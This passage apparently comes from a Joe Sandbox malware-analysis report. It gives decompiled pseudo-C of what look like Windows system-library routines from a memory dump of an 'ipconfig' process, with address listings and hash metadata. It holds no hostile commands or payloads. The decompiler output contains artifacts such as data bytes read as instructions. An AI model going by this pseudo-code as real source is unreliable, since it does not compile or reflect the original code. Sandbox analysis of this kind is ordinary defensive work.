              				signed int* _v48;
              				signed int _v52;
              				signed int _v56;
              				intOrPtr _v60;
              				intOrPtr _v64;
              				intOrPtr _v68;
              				intOrPtr _v72;
              				intOrPtr _v76;
              				char _v77;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				intOrPtr* _t65;
              				intOrPtr _t67;
              				intOrPtr _t68;
              				char* _t73;
              				intOrPtr _t77;
              				intOrPtr _t78;
              				signed int _t82;
              				intOrPtr _t83;
              				void* _t87;
              				char _t88;
              				intOrPtr* _t89;
              				intOrPtr _t91;
              				void* _t97;
              				intOrPtr _t100;
              				void* _t102;
              				void* _t107;
              				signed int _t108;
              				intOrPtr* _t112;
              				void* _t113;
              				intOrPtr* _t114;
              				intOrPtr _t115;
              				intOrPtr _t116;
              				intOrPtr _t117;
              				signed int _t118;
              				void* _t130;
              
              				_t120 = (_t118 & 0xfffffff8) - 0x4c;
              				_v8 =  *0x2f8d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
              				_t112 = __ecx;
              				_v77 = __edx;
              				_v48 = __ecx;
              				_v28 = 0;
              				_t5 = _t112 + 0xc; // 0x575651ff
              				_t105 =  *_t5;
              				_v20 = 0;
              				_v16 = 0;
              				if(_t105 == 0) {
              					_t50 = _t112 + 4; // 0x5de58b5b
              					_t60 =  *__ecx |  *_t50;
              					if(( *__ecx |  *_t50) != 0) {
              						 *__ecx = 0;
              						__ecx[1] = 0;
              						if(E02EB7D50() != 0) {
              							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
              						} else {
              							_t65 = 0x7ffe0386;
              						}
              						if( *_t65 != 0) {
              							E02F68CD6(_t112);
              						}
              						_push(0);
              						_t52 = _t112 + 0x10; // 0x778df98b
              						_push( *_t52);
              						_t60 = E02ED9E20();
              					}
              					L20:
              					_pop(_t107);
              					_pop(_t113);
              					_pop(_t87);
              					return E02EDB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
              				}
              				_t8 = _t112 + 8; // 0x8b000cc2
              				_t67 =  *_t8;
              				_t88 =  *((intOrPtr*)(_t67 + 0x10));
              				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
              				_t108 =  *(_t67 + 0x14);
              				_t68 =  *((intOrPtr*)(_t105 + 0x14));
              				_t105 = 0x2710;
              				asm("sbb eax, edi");
              				_v44 = _t88;
              				_v52 = _t108;
              				_t60 = E02EDCE00(_t97, _t68, 0x2710, 0);
              				_v56 = _t60;
              				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
              					L3:
              					 *(_t112 + 0x44) = _t60;
              					_t105 = _t60 * 0x2710 >> 0x20;
              					 *_t112 = _t88;
              					 *(_t112 + 4) = _t108;
              					_v20 = _t60 * 0x2710;
              					_v16 = _t60 * 0x2710 >> 0x20;
              					if(_v77 != 0) {
              						L16:
              						_v36 = _t88;
              						_v32 = _t108;
              						if(E02EB7D50() != 0) {
              							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
              						} else {
              							_t73 = 0x7ffe0386;
              						}
              						if( *_t73 != 0) {
              							_t105 = _v40;
              							E02F68F6A(_t112, _v40, _t88, _t108);
              						}
              						_push( &_v28);
              						_push(0);
              						_push( &_v36);
              						_t48 = _t112 + 0x10; // 0x778df98b
              						_push( *_t48);
              						_t60 = E02EDAF60();
              						goto L20;
              					} else {
              						_t89 = 0x7ffe03b0;
              						do {
              							_t114 = 0x7ffe0010;
              							do {
              								_t77 =  *0x2f88628; // 0x0
              								_v68 = _t77;
              								_t78 =  *0x2f8862c; // 0x0
              								_v64 = _t78;
              								_v72 =  *_t89;
              								_v76 =  *((intOrPtr*)(_t89 + 4));
              								while(1) {
              									_t105 =  *0x7ffe000c;
              									_t100 =  *0x7ffe0008;
              									if(_t105 ==  *_t114) {
              										goto L8;
              									}
              									asm("pause");
              								}
              								L8:
              								_t89 = 0x7ffe03b0;
              								_t115 =  *0x7ffe03b0;
              								_t82 =  *0x7FFE03B4;
              								_v60 = _t115;
              								_t114 = 0x7ffe0010;
              								_v56 = _t82;
              							} while (_v72 != _t115 || _v76 != _t82);
              							_t83 =  *0x2f88628; // 0x0
              							_t116 =  *0x2f8862c; // 0x0
              							_v76 = _t116;
              							_t117 = _v68;
              						} while (_t117 != _t83 || _v64 != _v76);
              						asm("sbb edx, [esp+0x24]");
              						_t102 = _t100 - _v60 - _t117;
              						_t112 = _v48;
              						_t91 = _v44;
              						asm("sbb edx, eax");
              						_t130 = _t105 - _v52;
              						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
              							_t88 = _t102 - _t91;
              							asm("sbb edx, edi");
              							_t108 = _t105;
              						} else {
              							_t88 = 0;
              							_t108 = 0;
              						}
              						goto L16;
              					}
              				} else {
              					if( *(_t112 + 0x44) == _t60) {
              						goto L20;
              					}
              					goto L3;
              				}
              			}
              0x02ebba35
              0x02ebba35
              0x02ebba41
              0x02ebba46
              0x02ebba4c
              0x02ebba50
              0x02ebba54
              0x02ebba6a
              0x02ebba6e
              0x02ebba70
              0x02ebba74
              0x02ebba78
              0x02ebba7a
              0x02ebba7c
              0x02ebba8e
              0x02ebba90
              0x02ebba92
              0x02ebbb14
              0x02ebbb14
              0x02ebbb16
              0x02ebbb16
              0x00000000
              0x02ebba7c
              0x02ebbb0a
              0x02ebbb0d
              0x00000000
              0x00000000
              0x00000000
              0x02ebbb0f

              APIs
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02EBB9A5
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
              • String ID:
              • API String ID: 885266447-0
              • Opcode ID: 0c3c34aaf3b9b2673bc1ada77b23fa9edf080f42b9d313d43512756c133099da
              • Instruction ID: e9558440b197ad9337158bfc77ffabc6100289f8c06d8ce74716604bd87e0d11
              • Opcode Fuzzy Hash: 0c3c34aaf3b9b2673bc1ada77b23fa9edf080f42b9d313d43512756c133099da
              • Instruction Fuzzy Hash: DC515371A48300CFCB21CF28C480A6BFBE5BF89658F54996EE99587344D730E844CB92
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 81%
              			E02EC2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, void* _a35) {
              				signed int _v8;
              				signed int _v16;
              				unsigned int _v24;
              				void* _v28;
              				signed int _v32;
              				unsigned int _v36;
              				void* _v37;
              				signed int _v40;
              				signed int _v44;
              				signed int _v48;
              				signed int _v52;
              				signed int _v56;
              				intOrPtr _v60;
              				signed int _v64;
              				signed int _v68;
              				signed int _v72;
              				signed int _v76;
              				signed int _v80;
              				signed int _t230;
              				signed int _t234;
              				signed int _t243;
              				signed int _t245;
              				intOrPtr _t247;
              				signed int _t250;
              				signed int _t257;
              				signed int _t260;
              				signed int _t268;
              				intOrPtr _t274;
              				signed int _t276;
              				signed int _t278;
              				void* _t283;
              				signed int _t284;
              				unsigned int _t287;
              				signed int _t291;
              				signed int _t295;
              				signed int _t299;
              				intOrPtr _t311;
              				signed int _t320;
              				signed int _t322;
              				signed int _t323;
              				signed int _t327;
              				signed int _t328;
              				signed int _t330;
              				signed int _t332;
              				signed int _t334;
              				void* _t335;
              				void* _t337;
              				void* _t338;
              
              				_t332 = _t334;
              				_t335 = _t334 - 0x4c;
              				_v8 =  *0x2f8d360 ^ _t332;
              				_push(__ebx);
              				_push(__esi);
              				_push(__edi);
              				_t327 = 0x2f8b2e8;
              				_v56 = _a4;
              				_v48 = __edx;
              				_v60 = __ecx;
              				_t287 = 0;
              				_v80 = 0;
              				asm("movsd");
              				_v64 = 0;
              				_v76 = 0;
              				_v72 = 0;
              				asm("movsd");
              				_v44 = 0;
              				_v52 = 0;
              				_v68 = 0;
              				asm("movsd");
              				_v32 = 0;
              				_v36 = 0;
              				asm("movsd");
              				_v16 = 0;
              				_t338 = (_v24 >> 0x0000001c & 0x00000003) - 1;
              				_t274 = 0x48;
              				_t309 = 0 | _t338 == 0x00000000;
              				_t320 = 0;
              				_v37 = _t338 == 0;
              				if(_v48 <= 0) {
              					L16:
              					_t45 = _t274 - 0x48; // 0x0
              					__eflags = _t45 - 0xfffe;
              					if(_t45 > 0xfffe) {
              						_t328 = 0xc0000106;
              						goto L32;
              					} else {
              						_t327 = L02EB4620(_t287,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t274);
              						_v52 = _t327;
              						__eflags = _t327;
              						if(_t327 == 0) {
              							_t328 = 0xc0000017;
              							goto L32;
              						} else {
              							 *(_t327 + 0x44) =  *(_t327 + 0x44) & 0x00000000;
              							_t50 = _t327 + 0x48; // 0x48
              							_t322 = _t50;
              							_t309 = _v32;
              							 *((intOrPtr*)(_t327 + 0x3c)) = _t274;
              							_t276 = 0;
              							 *((short*)(_t327 + 0x30)) = _v48;
              							__eflags = _t309;
              							if(_t309 != 0) {
              								 *(_t327 + 0x18) = _t322;
              								__eflags = _t309 - 0x2f88478;
              								 *_t327 = ((0 | _t309 == 0x02f88478) - 0x00000001 & 0xfffffffb) + 7;
              								E02EDF3E0(_t322,  *((intOrPtr*)(_t309 + 4)),  *_t309 & 0x0000ffff);
              								_t309 = _v32;
              								_t335 = _t335 + 0xc;
              								_t276 = 1;
              								__eflags = _a8;
              								_t322 = _t322 + (( *_t309 & 0x0000ffff) >> 1) * 2;
              								if(_a8 != 0) {
              									_t268 = E02F239F2(_t322);
              									_t309 = _v32;
              									_t322 = _t268;
              								}
              							}
              							_t291 = 0;
              							_v16 = 0;
              							__eflags = _v48;
              							if(_v48 <= 0) {
              								L31:
              								_t328 = _v68;
              								__eflags = 0;
              								 *((short*)(_t322 - 2)) = 0;
              								goto L32;
              							} else {
              								_t278 = _t327 + _t276 * 4;
              								_v56 = _t278;
              								do {
              									__eflags = _t309;
              									if(_t309 != 0) {
              										_t230 =  *(_v60 + _t291 * 4);
              										__eflags = _t230;
              										if(_t230 == 0) {
              											goto L30;
              										} else {
              											__eflags = _t230 == 5;
              											if(_t230 == 5) {
              												goto L30;
              											} else {
              												goto L22;
              											}
              										}
              									} else {
              										L22:
              										 *_t278 =  *(_v60 + _t291 * 4);
              										 *(_t278 + 0x18) = _t322;
              										_t234 =  *(_v60 + _t291 * 4);
              										__eflags = _t234 - 8;
              										if(_t234 > 8) {
              											goto L56;
              										} else {
              											switch( *((intOrPtr*)(_t234 * 4 +  &M02EC2959))) {
              												case 0:
              													__ax =  *0x2f88488;
              													__eflags = __ax;
              													if(__ax == 0) {
              														goto L29;
              													} else {
              														__ax & 0x0000ffff = E02EDF3E0(__edi,  *0x2f8848c, __ax & 0x0000ffff);
              														__eax =  *0x2f88488 & 0x0000ffff;
              														goto L26;
              													}
              													goto L108;
              												case 1:
              													L45:
              													E02EDF3E0(_t322, _v80, _v64);
              													_t263 = _v64;
              													goto L26;
              												case 2:
              													 *0x2f88480 & 0x0000ffff = E02EDF3E0(__edi,  *0x2f88484,  *0x2f88480 & 0x0000ffff);
              													__eax =  *0x2f88480 & 0x0000ffff;
              													__eax = ( *0x2f88480 & 0x0000ffff) >> 1;
              													__edi = __edi + __eax * 2;
              													goto L28;
              												case 3:
              													__eax = _v44;
              													__eflags = __eax;
              													if(__eax == 0) {
              														goto L29;
              													} else {
              														__esi = __eax + __eax;
              														__eax = E02EDF3E0(__edi, _v72, __esi);
              														__edi = __edi + __esi;
              														__esi = _v52;
              														goto L27;
              													}
              													goto L108;
              												case 4:
              													_push(0x2e);
              													_pop(__eax);
              													 *(__esi + 0x44) = __edi;
              													 *__edi = __ax;
              													__edi = __edi + 4;
              													_push(0x3b);
              													_pop(__eax);
              													 *(__edi - 2) = __ax;
              													goto L29;
              												case 5:
              													__eflags = _v36;
              													if(_v36 == 0) {
              														goto L45;
              													} else {
              														E02EDF3E0(_t322, _v76, _v36);
              														_t263 = _v36;
              													}
              													L26:
              													_t335 = _t335 + 0xc;
              													_t322 = _t322 + (_t263 >> 1) * 2 + 2;
              													__eflags = _t322;
              													L27:
              													_push(0x3b);
              													_pop(_t265);
              													 *((short*)(_t322 - 2)) = _t265;
              													goto L28;
              												case 6:
              													__ebx =  *0x2f8575c;
              													__eflags = __ebx - 0x2f8575c;
              													if(__ebx != 0x2f8575c) {
              														_push(0x3b);
              														_pop(__esi);
              														do {
              															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
              															E02EDF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
              															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
              															__edi = __edi + __eax * 2;
              															__edi = __edi + 2;
              															 *(__edi - 2) = __si;
              															__ebx =  *__ebx;
              															__eflags = __ebx - 0x2f8575c;
              														} while (__ebx != 0x2f8575c);
              														__esi = _v52;
              														__ecx = _v16;
              														__edx = _v32;
              													}
              													__ebx = _v56;
              													goto L29;
              												case 7:
              													 *0x2f88478 & 0x0000ffff = E02EDF3E0(__edi,  *0x2f8847c,  *0x2f88478 & 0x0000ffff);
              													__eax =  *0x2f88478 & 0x0000ffff;
              													__eax = ( *0x2f88478 & 0x0000ffff) >> 1;
              													__eflags = _a8;
              													__edi = __edi + __eax * 2;
              													if(_a8 != 0) {
              														__ecx = __edi;
              														__eax = E02F239F2(__ecx);
              														__edi = __eax;
              													}
              													goto L28;
              												case 8:
              													__eax = 0;
              													 *(__edi - 2) = __ax;
              													 *0x2f86e58 & 0x0000ffff = E02EDF3E0(__edi,  *0x2f86e5c,  *0x2f86e58 & 0x0000ffff);
              													 *(__esi + 0x38) = __edi;
              													__eax =  *0x2f86e58 & 0x0000ffff;
              													__eax = ( *0x2f86e58 & 0x0000ffff) >> 1;
              													__edi = __edi + __eax * 2;
              													__edi = __edi + 2;
              													L28:
              													_t291 = _v16;
              													_t309 = _v32;
              													L29:
              													_t278 = _t278 + 4;
              													__eflags = _t278;
              													_v56 = _t278;
              													goto L30;
              											}
              										}
              									}
              									goto L108;
              									L30:
              									_t291 = _t291 + 1;
              									_v16 = _t291;
              									__eflags = _t291 - _v48;
              								} while (_t291 < _v48);
              								goto L31;
              							}
              						}
              					}
              				} else {
              					while(1) {
              						L1:
              						_t234 =  *(_v60 + _t320 * 4);
              						if(_t234 > 8) {
              							break;
              						}
              						switch( *((intOrPtr*)(_t234 * 4 +  &M02EC2935))) {
              							case 0:
              								__ax =  *0x2f88488;
              								__eflags = __ax;
              								if(__ax != 0) {
              									__eax = __ax & 0x0000ffff;
              									__ebx = __ebx + 2;
              									__eflags = __ebx;
              									goto L53;
              								}
              								goto L14;
              							case 1:
              								L44:
              								_t309 =  &_v64;
              								_v80 = E02EC2E3E(0,  &_v64);
              								_t274 = _t274 + _v64 + 2;
              								goto L13;
              							case 2:
              								__eax =  *0x2f88480 & 0x0000ffff;
              								__ebx = __ebx + __eax;
              								__eflags = __dl;
              								if(__dl != 0) {
              									__eax = 0x2f88480;
              									goto L80;
              								}
              								goto L14;
              							case 3:
              								__eax = E02EAEEF0(0x2f879a0);
              								__eax =  &_v44;
              								_push(__eax);
              								_push(0);
              								_push(0);
              								_push(4);
              								_push(L"PATH");
              								_push(0);
              								L57();
              								__esi = __eax;
              								_v68 = __esi;
              								__eflags = __esi - 0xc0000023;
              								if(__esi != 0xc0000023) {
              									L10:
              									__eax = E02EAEB70(__ecx, 0x2f879a0);
              									__eflags = __esi - 0xc0000100;
              									if(__esi == 0xc0000100) {
              										_v44 = _v44 & 0x00000000;
              										__eax = 0;
              										_v68 = 0;
              										goto L13;
              									} else {
              										__eflags = __esi;
              										if(__esi < 0) {
              											L32:
              											_t208 = _v72;
              											__eflags = _t208;
              											if(_t208 != 0) {
              												L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t208);
              											}
              											_t209 = _v52;
              											__eflags = _t209;
              											if(_t209 != 0) {
              												__eflags = _t328;
              												if(_t328 < 0) {
              													L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t209);
              													_t209 = 0;
              												}
              											}
              											goto L36;
              										} else {
              											__eax = _v44;
              											__ebx = __ebx + __eax * 2;
              											__ebx = __ebx + 2;
              											__eflags = __ebx;
              											L13:
              											_t287 = _v36;
              											goto L14;
              										}
              									}
              								} else {
              									__eax = _v44;
              									__ecx =  *0x2f87b9c; // 0x0
              									_v44 + _v44 =  *[fs:0x30];
              									__ecx = __ecx + 0x180000;
              									__eax = L02EB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
              									_v72 = __eax;
              									__eflags = __eax;
              									if(__eax == 0) {
              										__eax = E02EAEB70(__ecx, 0x2f879a0);
              										__eax = _v52;
              										L36:
              										_pop(_t321);
              										_pop(_t329);
              										__eflags = _v8 ^ _t332;
              										_pop(_t275);
              										return E02EDB640(_t209, _t275, _v8 ^ _t332, _t309, _t321, _t329);
              									} else {
              										__ecx =  &_v44;
              										_push(__ecx);
              										_push(_v44);
              										_push(__eax);
              										_push(4);
              										_push(L"PATH");
              										_push(0);
              										L57();
              										__esi = __eax;
              										_v68 = __eax;
              										goto L10;
              									}
              								}
              								goto L108;
              							case 4:
              								__ebx = __ebx + 4;
              								goto L14;
              							case 5:
              								_t270 = _v56;
              								if(_v56 != 0) {
              									_t309 =  &_v36;
              									_t272 = E02EC2E3E(_t270,  &_v36);
              									_t287 = _v36;
              									_v76 = _t272;
              								}
              								if(_t287 == 0) {
              									goto L44;
              								} else {
              									_t274 = _t274 + 2 + _t287;
              								}
              								goto L14;
              							case 6:
              								__eax =  *0x2f85764 & 0x0000ffff;
              								goto L53;
              							case 7:
              								__eax =  *0x2f88478 & 0x0000ffff;
              								__ebx = __ebx + __eax;
              								__eflags = _a8;
              								if(_a8 != 0) {
              									__ebx = __ebx + 0x16;
              									__ebx = __ebx + __eax;
              								}
              								__eflags = __dl;
              								if(__dl != 0) {
              									__eax = 0x2f88478;
              									L80:
              									_v32 = __eax;
              								}
              								goto L14;
              							case 8:
              								__eax =  *0x2f86e58 & 0x0000ffff;
              								__eax = ( *0x2f86e58 & 0x0000ffff) + 2;
              								L53:
              								__ebx = __ebx + __eax;
              								L14:
              								_t320 = _t320 + 1;
              								if(_t320 >= _v48) {
              									goto L16;
              								} else {
              									_t309 = _v37;
              									goto L1;
              								}
              								goto L108;
              						}
              					}
              					L56:
              					asm("int 0x29");
              					asm("out 0x28, al");
              					asm("in al, dx");
              					asm("in al, dx");
              					asm("daa");
              					asm("in al, dx");
              					asm("in al, dx");
              					asm("in al, dx");
              					asm("lock add dl, [eax+ebp+0x5b3502ec]");
              					asm("lock add al, [edx]");
              					_t337 = _t335 - _t332;
              					asm("daa");
              					asm("in al, dx");
              					asm("in al, dx");
              					asm("in al, dx");
              					_t283 = 0x25;
              					asm("lock add dh, [eax+ebp+0x5c3402ec]");
              					asm("lock add cl, ah");
              					asm("int3");
              					asm("int3");
              					asm("int3");
              					asm("int3");
              					asm("int3");
              					asm("int3");
              					asm("int3");
              					asm("int3");
              					asm("int3");
              					asm("int3");
              					asm("int3");
              					asm("int3");
              					asm("int3");
              					asm("int3");
              					asm("int3");
              					asm("int3");
              					asm("int3");
              					asm("int3");
              					_push(0x20);
              					_push(0x2f6ff00);
              					E02EED08C(_t283, _t322, _t327);
              					_v44 =  *[fs:0x18];
              					_t323 = 0;
              					 *_a24 = 0;
              					_t284 = _a12;
              					__eflags = _t284;
              					if(_t284 == 0) {
              						_t243 = 0xc0000100;
              					} else {
              						_v8 = 0;
              						_t330 = 0xc0000100;
              						_v52 = 0xc0000100;
              						_t245 = 4;
              						while(1) {
              							_v40 = _t245;
              							__eflags = _t245;
              							if(_t245 == 0) {
              								break;
              							}
              							_t299 = _t245 * 0xc;
              							_v48 = _t299;
              							__eflags = _t284 -  *((intOrPtr*)(_t299 + 0x2e71664));
              							if(__eflags <= 0) {
              								if(__eflags == 0) {
              									_t260 = E02EDE5C0(_a8,  *((intOrPtr*)(_t299 + 0x2e71668)), _t284);
              									_t337 = _t337 + 0xc;
              									__eflags = _t260;
              									if(__eflags == 0) {
              										_t330 = E02F151BE(_t284,  *((intOrPtr*)(_v48 + 0x2e7166c)), _a16, _t323, _t330, __eflags, _a20, _a24);
              										_v52 = _t330;
              										break;
              									} else {
              										_t245 = _v40;
              										goto L62;
              									}
              									goto L70;
              								} else {
              									L62:
              									_t245 = _t245 - 1;
              									continue;
              								}
              							}
              							break;
              						}
              						_v32 = _t330;
              						__eflags = _t330;
              						if(_t330 < 0) {
              							__eflags = _t330 - 0xc0000100;
              							if(_t330 == 0xc0000100) {
              								_t295 = _a4;
              								__eflags = _t295;
              								if(_t295 != 0) {
              									_v36 = _t295;
              									__eflags =  *_t295 - _t323;
              									if( *_t295 == _t323) {
              										_t330 = 0xc0000100;
              										goto L76;
              									} else {
              										_t311 =  *((intOrPtr*)(_v44 + 0x30));
              										_t247 =  *((intOrPtr*)(_t311 + 0x10));
              										__eflags =  *((intOrPtr*)(_t247 + 0x48)) - _t295;
              										if( *((intOrPtr*)(_t247 + 0x48)) == _t295) {
              											__eflags =  *(_t311 + 0x1c);
              											if( *(_t311 + 0x1c) == 0) {
              												L106:
              												_t330 = E02EC2AE4( &_v36, _a8, _t284, _a16, _a20, _a24);
              												_v32 = _t330;
              												__eflags = _t330 - 0xc0000100;
              												if(_t330 != 0xc0000100) {
              													goto L69;
              												} else {
              													_t323 = 1;
              													_t295 = _v36;
              													goto L75;
              												}
              											} else {
              												_t250 = E02EA6600( *(_t311 + 0x1c));
              												__eflags = _t250;
              												if(_t250 != 0) {
              													goto L106;
              												} else {
              													_t295 = _a4;
              													goto L75;
              												}
              											}
              										} else {
              											L75:
              											_t330 = E02EC2C50(_t295, _a8, _t284, _a16, _a20, _a24, _t323);
              											L76:
              											_v32 = _t330;
              											goto L69;
              										}
              									}
              									goto L108;
              								} else {
              									E02EAEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
              									_v8 = 1;
              									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
              									_t330 = _a24;
              									_t257 = E02EC2AE4( &_v36, _a8, _t284, _a16, _a20, _t330);
              									_v32 = _t257;
              									__eflags = _t257 - 0xc0000100;
              									if(_t257 == 0xc0000100) {
              										_v32 = E02EC2C50(_v36, _a8, _t284, _a16, _a20, _t330, 1);
              									}
              									_v8 = _t323;
              									E02EC2ACB();
              								}
              							}
              						}
              						L69:
              						_v8 = 0xfffffffe;
              						_t243 = _t330;
              					}
              					L70:
              					return E02EED0D1(_t243);
              				}
              				L108:
              			}
              0x00000000
              0x00000000
              0x02ec2756
              0x02ec2750
              0x00000000
              0x02ec2794
              0x02ec2794
              0x02ec2795
              0x02ec2798
              0x02ec2798
              0x00000000
              0x02ec2734
              0x02ec272c
              0x02ec2700
              0x02ec25ef
              0x02ec25ef
              0x02ec25ef
              0x02ec25f2
              0x02ec25f8
              0x00000000
              0x00000000
              0x02ec25fe
              0x00000000
              0x02ec28e6
              0x02ec28ec
              0x02ec28ef
              0x02ec28f5
              0x02ec28f8
              0x02ec28f8
              0x00000000
              0x02ec28f8
              0x00000000
              0x00000000
              0x02ec2866
              0x02ec2866
              0x02ec2876
              0x02ec2879
              0x00000000
              0x00000000
              0x02ec27e0
              0x02ec27e7
              0x02ec27e9
              0x02ec27eb
              0x02f05afd
              0x00000000
              0x02f05afd
              0x00000000
              0x00000000
              0x02ec2633
              0x02ec2638
              0x02ec263b
              0x02ec263c
              0x02ec263e
              0x02ec2640
              0x02ec2642
              0x02ec2647
              0x02ec2649
              0x02ec264e
              0x02ec2650
              0x02ec2653
              0x02ec2659
              0x02ec26a2
              0x02ec26a7
              0x02ec26ac
              0x02ec26b2
              0x02f05b11
              0x02f05b15
              0x02f05b17
              0x00000000
              0x02ec26b8
              0x02ec26b8
              0x02ec26ba
              0x02ec27a6
              0x02ec27a6
              0x02ec27a9
              0x02ec27ab
              0x02ec27b9
              0x02ec27b9
              0x02ec27be
              0x02ec27c1
              0x02ec27c3
              0x02ec27c5
              0x02ec27c7
              0x02f05c74
              0x02f05c79
              0x02f05c79
              0x02ec27c7
              0x00000000
              0x02ec26c0
              0x02ec26c0
              0x02ec26c3
              0x02ec26c6
              0x02ec26c6
              0x02ec26c9
              0x02ec26c9
              0x00000000
              0x02ec26c9
              0x02ec26ba
              0x02ec265b
              0x02ec265b
              0x02ec265e
              0x02ec2667
              0x02ec266d
              0x02ec2677
              0x02ec267c
              0x02ec267f
              0x02ec2681
              0x02f05b49
              0x02f05b4e
              0x02ec27cd
              0x02ec27d0
              0x02ec27d1
              0x02ec27d2
              0x02ec27d4
              0x02ec27dd
              0x02ec2687
              0x02ec2687
              0x02ec268a
              0x02ec268b
              0x02ec268e
              0x02ec268f
              0x02ec2691
              0x02ec2696
              0x02ec2698
              0x02ec269d
              0x02ec269f
              0x00000000
              0x02ec269f
              0x02ec2681
              0x00000000
              0x00000000
              0x02ec2846
              0x00000000
              0x00000000
              0x02ec2605
              0x02ec260a
              0x02ec260c
              0x02ec2611
              0x02ec2616
              0x02ec2619
              0x02ec2619
              0x02ec261e
              0x00000000
              0x02ec2624
              0x02ec2627
              0x02ec2627
              0x00000000
              0x00000000
              0x02f05b1f
              0x00000000
              0x00000000
              0x02ec2894
              0x02ec289b
              0x02ec289d
              0x02ec28a1
              0x02f05b2b
              0x02f05b2e
              0x02f05b2e
              0x02ec28a7
              0x02ec28a9
              0x02f05b04
              0x02f05b09
              0x02f05b09
              0x02f05b09
              0x00000000
              0x00000000
              0x02f05b35
              0x02f05b3c
              0x02ec28fb
              0x02ec28fb
              0x02ec26cc
              0x02ec26cc
              0x02ec26d0
              0x00000000
              0x02ec26d2
              0x02ec26d2
              0x00000000
              0x02ec26d2
              0x00000000
              0x00000000
              0x02ec25fe
              0x02ec292d
              0x02ec2930
              0x02ec2935
              0x02ec2937
              0x02ec293b
              0x02ec293e
              0x02ec293f
              0x02ec2942
              0x02ec2947
              0x02ec294f
              0x02ec2957
              0x02ec295a
              0x02ec2962
              0x02ec2963
              0x02ec296b
              0x02ec296f
              0x02ec2972
              0x02ec2973
              0x02ec297b
              0x02ec297e
              0x02ec297f
              0x02ec2980
              0x02ec2981
              0x02ec2982
              0x02ec2983
              0x02ec2984
              0x02ec2985
              0x02ec2986
              0x02ec2987
              0x02ec2988
              0x02ec2989
              0x02ec298a
              0x02ec298b
              0x02ec298c
              0x02ec298d
              0x02ec298e
              0x02ec298f
              0x02ec2990
              0x02ec2992
              0x02ec2997
              0x02ec29a3
              0x02ec29a6
              0x02ec29ab
              0x02ec29ad
              0x02ec29b0
              0x02ec29b2
              0x02f05c80
              0x02ec29b8
              0x02ec29b8
              0x02ec29bb
              0x02ec29c0
              0x02ec29c5
              0x02ec29c6
              0x02ec29c6
              0x02ec29c9
              0x02ec29cb
              0x00000000
              0x00000000
              0x02ec29cd
              0x02ec29d0
              0x02ec29d9
              0x02ec29db
              0x02ec29dd
              0x02ec2a7f
              0x02ec2a84
              0x02ec2a87
              0x02ec2a89
              0x02f05ca1
              0x02f05ca3
              0x00000000
              0x02ec2a8f
              0x02ec2a8f
              0x00000000
              0x02ec2a8f
              0x00000000
              0x02ec29e3
              0x02ec29e3
              0x02ec29e3
              0x00000000
              0x02ec29e3
              0x02ec29dd
              0x00000000
              0x02ec29db
              0x02ec29e6
              0x02ec29e9
              0x02ec29eb
              0x02ec29ed
              0x02ec29f3
              0x02ec29f5
              0x02ec29f8
              0x02ec29fa
              0x02ec2a97
              0x02ec2a9a
              0x02ec2a9d
              0x02ec2add
              0x00000000
              0x02ec2a9f
              0x02ec2aa2
              0x02ec2aa5
              0x02ec2aa8
              0x02ec2aab
              0x02f05cab
              0x02f05caf
              0x02f05cc5
              0x02f05cda
              0x02f05cdc
              0x02f05cdf
              0x02f05ce5
              0x00000000
              0x02f05ceb
              0x02f05ced
              0x02f05cee
              0x00000000
              0x02f05cee
              0x02f05cb1
              0x02f05cb4
              0x02f05cb9
              0x02f05cbb
              0x00000000
              0x02f05cbd
              0x02f05cbd
              0x00000000
              0x02f05cbd
              0x02f05cbb
              0x02ec2ab1
              0x02ec2ab1
              0x02ec2ac4
              0x02ec2ac6
              0x02ec2ac6
              0x00000000
              0x02ec2ac6
              0x02ec2aab
              0x00000000
              0x02ec2a00
              0x02ec2a09
              0x02ec2a0e
              0x02ec2a21
              0x02ec2a24
              0x02ec2a35
              0x02ec2a3a
              0x02ec2a3d
              0x02ec2a42
              0x02ec2a59
              0x02ec2a59
              0x02ec2a5c
              0x02ec2a5f
              0x02ec2a5f
              0x02ec29fa
              0x02ec29f3
              0x02ec2a64
              0x02ec2a64
              0x02ec2a6b
              0x02ec2a6b
              0x02ec2a6d
              0x02ec2a72
              0x02ec2a72
              0x00000000

              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
